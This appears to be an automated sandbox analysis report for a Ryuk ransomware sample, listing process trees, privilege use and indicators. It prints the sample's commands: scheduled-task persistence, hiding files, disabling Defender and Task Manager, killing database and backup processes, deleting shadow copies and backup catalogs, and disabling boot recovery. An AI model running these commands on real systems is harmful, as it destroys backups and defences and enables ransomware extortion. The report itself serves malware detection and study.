2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exewevtutil.exevssvc.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1532	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeIncreaseQuotaPrivilege	592	wevtutil.exe
Token: SeSecurityPrivilege	592	wevtutil.exe
Token: SeTakeOwnershipPrivilege	592	wevtutil.exe
Token: SeLoadDriverPrivilege	592	wevtutil.exe
Token: SeSystemProfilePrivilege	592	wevtutil.exe
Token: SeSystemtimePrivilege	592	wevtutil.exe
Token: SeProfSingleProcessPrivilege	592	wevtutil.exe
Token: SeIncBasePriorityPrivilege	592	wevtutil.exe
Token: SeCreatePagefilePrivilege	592	wevtutil.exe
Token: SeBackupPrivilege	592	wevtutil.exe
Token: SeRestorePrivilege	592	wevtutil.exe
Token: SeShutdownPrivilege	592	wevtutil.exe
Token: SeDebugPrivilege	592	wevtutil.exe
Token: SeSystemEnvironmentPrivilege	592	wevtutil.exe
Token: SeRemoteShutdownPrivilege	592	wevtutil.exe
Token: SeUndockPrivilege	592	wevtutil.exe
Token: SeManageVolumePrivilege	592	wevtutil.exe
Token: 33	592	wevtutil.exe
Token: 34	592	wevtutil.exe
Token: 35	592	wevtutil.exe
Token: SeBackupPrivilege	1312	vssvc.exe
Token: SeRestorePrivilege	1312	vssvc.exe
Token: SeAuditPrivilege	1312	vssvc.exe
Token: SeIncreaseQuotaPrivilege	592	wevtutil.exe
Token: SeSecurityPrivilege	592	wevtutil.exe
Token: SeTakeOwnershipPrivilege	592	wevtutil.exe
Token: SeLoadDriverPrivilege	592	wevtutil.exe
Token: SeSystemProfilePrivilege	592	wevtutil.exe
Token: SeSystemtimePrivilege	592	wevtutil.exe
Token: SeProfSingleProcessPrivilege	592	wevtutil.exe
Token: SeIncBasePriorityPrivilege	592	wevtutil.exe
Token: SeCreatePagefilePrivilege	592	wevtutil.exe
Token: SeBackupPrivilege	592	wevtutil.exe
Token: SeRestorePrivilege	592	wevtutil.exe
Token: SeShutdownPrivilege	592	wevtutil.exe
Token: SeDebugPrivilege	592	wevtutil.exe
Token: SeSystemEnvironmentPrivilege	592	wevtutil.exe
Token: SeRemoteShutdownPrivilege	592	wevtutil.exe
Token: SeUndockPrivilege	592	wevtutil.exe
Token: SeManageVolumePrivilege	592	wevtutil.exe
Token: 33	592	wevtutil.exe
Token: 34	592	wevtutil.exe
Token: 35	592	wevtutil.exe
Token: SeDebugPrivilege	1540	wevtutil.exe
Token: SeDebugPrivilege	960	wevtutil.exe
Token: SeDebugPrivilege	1448	wevtutil.exe
Token: SeSecurityPrivilege	1460	wevtutil.exe
Token: SeBackupPrivilege	1460	wevtutil.exe
Token: SeSecurityPrivilege	1676	wevtutil.exe
Token: SeBackupPrivilege	1676	wevtutil.exe
Token: SeSecurityPrivilege	2012	wevtutil.exe
Token: SeBackupPrivilege	2012	wevtutil.exe
Token: SeSecurityPrivilege	1044	wevtutil.exe
Token: SeBackupPrivilege	1044	wevtutil.exe
Token: SeSecurityPrivilege	224	wevtutil.exe
Token: SeBackupPrivilege	224	wevtutil.exe
Token: SeSecurityPrivilege	212	wevtutil.exe
Token: SeBackupPrivilege	212	wevtutil.exe
Token: SeSecurityPrivilege	1028	wevtutil.exe
Token: SeBackupPrivilege	1028	wevtutil.exe
Token: SeSecurityPrivilege	2036	wevtutil.exe
Token: SeBackupPrivilege	2036	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2016 wrote to memory of 1284	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1284	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1284	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1284 wrote to memory of 848	1284	cmd.exe	schtasks.exe
PID 1284 wrote to memory of 848	1284	cmd.exe	schtasks.exe
PID 1284 wrote to memory of 848	1284	cmd.exe	schtasks.exe
PID 2016 wrote to memory of 1864	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1864	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1864	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 2040	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 2040	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 2040	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1256	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1256	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1256	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1256 wrote to memory of 2032	1256	cmd.exe	schtasks.exe
PID 1256 wrote to memory of 2032	1256	cmd.exe	schtasks.exe
PID 1256 wrote to memory of 2032	1256	cmd.exe	schtasks.exe
PID 2016 wrote to memory of 2036	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 2036	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 2036	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2036 wrote to memory of 1540	2036	cmd.exe	attrib.exe
PID 2036 wrote to memory of 1540	2036	cmd.exe	attrib.exe
PID 2036 wrote to memory of 1540	2036	cmd.exe	attrib.exe
PID 2016 wrote to memory of 1676	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1676	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1676	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1676 wrote to memory of 2000	1676	cmd.exe	schtasks.exe
PID 1676 wrote to memory of 2000	1676	cmd.exe	schtasks.exe
PID 1676 wrote to memory of 2000	1676	cmd.exe	schtasks.exe
PID 2016 wrote to memory of 696	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 696	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 696	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 696 wrote to memory of 564	696	cmd.exe	schtasks.exe
PID 696 wrote to memory of 564	696	cmd.exe	schtasks.exe
PID 696 wrote to memory of 564	696	cmd.exe	schtasks.exe
PID 2016 wrote to memory of 676	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 676	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 676	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 676 wrote to memory of 688	676	cmd.exe	attrib.exe
PID 676 wrote to memory of 688	676	cmd.exe	attrib.exe
PID 676 wrote to memory of 688	676	cmd.exe	attrib.exe
PID 2016 wrote to memory of 1012	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1012	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1012	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1012 wrote to memory of 1916	1012	cmd.exe	attrib.exe
PID 1012 wrote to memory of 1916	1012	cmd.exe	attrib.exe
PID 1012 wrote to memory of 1916	1012	cmd.exe	attrib.exe
PID 2016 wrote to memory of 1028	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1028	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1028	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1028 wrote to memory of 1244	1028	cmd.exe	cmd.exe
PID 1028 wrote to memory of 1244	1028	cmd.exe	cmd.exe
PID 1028 wrote to memory of 1244	1028	cmd.exe	cmd.exe
PID 2016 wrote to memory of 1508	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1508	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 1508	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 112	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 112	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 2016 wrote to memory of 112	2016	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1508 wrote to memory of 1068	1508	cmd.exe	cmd.exe
PID 1508 wrote to memory of 1068	1508	cmd.exe	cmd.exe
PID 1508 wrote to memory of 1068	1508	cmd.exe	cmd.exe
PID 112 wrote to memory of 964	112	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1540 attrib.exe
688 attrib.exe
1916 attrib.exe
1628 attrib.exe
1660 attrib.exe

pid	process
1540	attrib.exe
688	attrib.exe
1916	attrib.exe
1628	attrib.exe
1660	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
"C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:1864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:2032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:696

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /F
3⤵
- Creates scheduled task(s)
PID:564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:1244

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:1904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:1068

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:1072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:1808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:1328

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1264

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1256

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:1540

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
PID:1384

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:1624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:2024

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:1084

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:1088

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:1256

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
PID:592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:956

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:812

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:1700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:636

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:520

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:1548

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1496

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:1044

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:2040

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:1540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:612

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:1012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:1628

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
3⤵
PID:1436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:1976

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:1932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:468

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1688

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:976

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:1304

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1088

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:1460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:2040

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:920

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
PID:960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:268

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
PID:1448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:324

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:1688

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:1148

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:1012

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:1524

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:688

C:\Windows\system32\cmd.exe
